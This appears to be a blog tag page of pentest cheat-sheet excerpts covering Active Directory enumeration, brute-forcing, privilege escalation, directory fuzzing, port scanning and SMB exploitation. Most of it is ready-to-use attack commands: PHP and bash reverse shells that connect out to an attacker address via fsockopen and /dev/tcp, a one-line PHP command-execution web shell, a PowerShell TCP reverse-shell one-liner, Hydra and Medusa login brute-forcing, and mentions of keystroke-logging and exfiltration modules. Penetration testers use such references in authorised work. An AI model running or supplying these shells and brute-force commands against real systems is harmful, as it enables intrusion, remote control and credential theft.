Table of Contents Enumeration Overall Information Enum4linux PowerView Module Domain Objects DNS Info System Relationship BloodHound-python SharpHound.ps1 GPP Policy Foothold Asrep Roasting Lateral Movement Pass the Password Pass the Hash Dump NTLM Hashes Dump SAM/LSA Token Impersonation DLL Hijacking Dump NTDS Enumeration Overall Information Enum4linux You have nothing, just want an overview of the system…
Tag: Pentest
TTYSpawn
Table of Contents Bash Python Bash SHELL=/bin/bash script -q /dev/null Python python -c 'import pty;pty.spawn("/bin/bash")'
BruteForcing
Table of Contents JohnTheRipper Medusa Online Resources Hydra Patator JohnTheRipper zip2john <zipfile> > <outputfile> john <hashfile> --fork=4 --wordlist=<wordlist> Medusa # brute forcing SSH login with usernames and passwords medusa -h <host-ip> -U <user-file> -P <passwd-file> -M ssh <host-ip> Online Resources Hash crack – CrackStation Hydra hydra -l <username> -P <pass-file> http://domain http-post-form "</login/path/>:<login-data>[username=^USER^&password=^PASS^]:<error-response>[Incorrect Username]" Patator…
PrivilegeEscalation
Table of Contents Linux Find SetUID Files Check User Privileges Interactive Programs with SUDO Privilege RottenPotato Kernel 2.6 LXD LXC Privilege Escalation Priv Escalation Through Sudoers Conf Exploit Suggester Rational Love VNC Linux Find SetUID Files find / -perm -4000 -type f 2>/dev/null Check User Privileges sudo -l -l Interactive Programs with SUDO Privilege sudo…
ReverseShell
Table of Contents PHP Reverse Shell Bash NetCat Net Cat CheatSheet Bat File PHP Reverse Shell php -r '$sock=fsockopen("10.0.0.1",4242);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' /usr/share/webshells/php/php-reverse-shell.php # cmd execution <?php system($_REQUEST['mycmd']) ?> Bash bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' NetCat nc <host> <port> If in meterpreter shell: execute -f…
DirectoryFuzzing
Table of Contents Dirbuster Gobuster Dirsearch Wfuzz Other Useful Tools Dirbuster dirbuster -u -v -u <URL> -e <extensions> -l <wordlist> -r <report-location> Gobuster gobuster dir|dns <URL> -v -t <threads> -w <wordlist> Dirsearch dirsearch.py -u <URL> -e <extensions> -t <threads> -c <cookies> --proxy=<proxy> Wfuzz wfuzz -c -v --hc <status-code> -w <wordlist> <URL>/FUZZ/* Other Useful Tools Tons…
PortScan
Table of Contents Nmap Masscan Unicorn Scan Nmap nmap -A -T4 -p- -v -oN nmap.txt <host> Masscan masscan -p 1-65535 <host> -e <interface> --rate=<rate> Unicorn Scan us -mT -Iv <host>:<ports[a|]> -r <rate[3000|]> -R <round[3|]>
Powershell
Table of Contents Reverse Shell One liner PowerSploit Invoke-Shellcode Invoke-WmiMethod Get-Keystrokes Exfiltration/Out-Minidump.ps1 Exfiltration/Get-TimedScreenshot.ps1 Nishang Get-Information.ps1 Get-WLAN-Keys.ps1 StartListener.py Ps_encoder.py Get System Release ID Executing Command as Another User Get User ACL Go into Registry Mode Reverse Shell One liner $client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName…
JuicyFiles
Table of Contents Linux Password Hash Files History Configuration Files Windows Configuration Files Hash Files Windows System Info Linux Password Hash Files passwd, shadow Content – User password hashes Features – SHA256Crypt hash Location – /etc Handle – unshadow <passfile> <shadowfile> then hashcat or john History bash_history Content – bash history Features – may contain…
Services
Table of Contents Samba Enumeration Smbclient Crackmapexec Psexec_command or Usermap_script Msf Foothold MS_17_010 Psexec.py Psexec Msf Smb_login Msf DistCC Foothold CVE-2004-2687 Samba Enumeration Smbclient List all shares smbclient -L \\\\<URL>\\ Crackmapexec List all shares crackmapexec smb <ip> -u <username> -p <password> --shares Psexec_command or Usermap_script Msf Execute smb command auxiliary/admin/smb/psexec_command set COMMAND [command you want…